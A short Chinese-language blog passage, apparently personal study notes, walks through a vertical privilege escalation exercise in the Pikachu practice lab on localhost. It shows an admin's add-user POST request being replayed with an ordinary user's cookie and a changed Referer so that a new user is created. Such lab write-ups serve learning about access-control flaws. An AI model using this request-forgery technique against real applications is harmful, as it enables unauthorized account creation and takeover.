(33) [横向和纵向越轨专题]越轨的原理、原因、危害和利用漏洞的过程 ......
最编程
2024-07-02 10:02:10
...
7.2.3、第三步:实现越权添加用户
再来看看提交数据时的数据包
使用admin(高权限)提交的表
POST /pikachu-master/vul/overpermission/op2/op2_admin_edit.php HTTP/1.1
……
username=test&password=000000&sex=%E7%94%B7&phonenum=1111111&email=%40qq.com&address=beijing&submit=%E5%88%9B%E5%BB%BA
使用pikachu(普通用户)的session执行添加操作
来的地址,是登录,这一步登录就变成修改了
(感觉就是伪造数据包)
Referer: http://localhost:8080/pikachu-master/vul/overpermission/op2/op2_login.php
然后请求方法和URL都改为修改时候的URL
POST /pikachu-master/vul/overpermission/op2/op2_admin_edit.php HTTP/1.1
使用的是pikachu的cookie
Cookie: PHPSESSID=tb9nagh7k6bteg9hj288pfh481
放包后再查看,就已经添加成功了
(这不就是数据包伪造嘛,不过他确实越权了,这个名字取的没毛病)
上一篇: 访问控制/覆盖漏洞 - 学习笔记
下一篇: 垂直越权